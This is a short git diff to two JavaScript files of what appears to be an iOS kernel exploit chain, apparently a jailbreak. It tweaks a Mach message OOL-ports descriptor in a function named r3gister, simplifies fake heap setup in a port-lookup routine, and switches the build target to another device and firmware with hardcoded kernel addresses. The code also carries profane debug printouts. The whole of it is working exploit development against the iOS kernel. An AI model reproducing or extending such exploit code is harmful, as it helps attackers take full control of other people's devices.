2 files changed, 4 insertions, 5 deletions

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 473bc6e..6a48f23 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 	write_u32(InP + 0x18, 1);
 	write_u32(InP + 0x1c, init_port_set);
 	write_u32(InP + 0x20, real_count);
-	write_u32(InP + 0x24, 0x0213c600);
+	write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
 	write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
 	write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
 	write_u32(InP + 0x30, fake_count);
@@ -349,10 +349,8 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 function mach_ports_lookup_shit() {
 	printf("fuck\n");
 	var arrz = shit_heap(4);
-	var arrz2 = shit_heap(4);
 	printf("fuck\n");
-	write_u32(arrz, arrz2);
-	write_u32(arrz2, 0);
+	write_u32(arrz, 0);
 	printf("fuck\n");
 	var sz = shit_heap(4);;
 	printf("fuck\n");
@@ -365,6 +363,7 @@ function mach_ports_lookup_shit() {
 	printf("mpl success\n");
 
 	return read_u32(read_u32(arrz) + 8);
+//	return 0x42603;
 }
 
 var kernel_task_addr = 0;
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 760ca40..e38026f 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -1,7 +1,7 @@
 var N94AP_13G37 = 0x0;
 var N78AP_13G36 = 0x1;
 
-var build_for = N78AP_13G36;
+var build_for = N94AP_13G37;
 
 if (build_for == N94AP_13G37) {
 	var __stack_chk_fail_lazy_addy = 0x346afc48;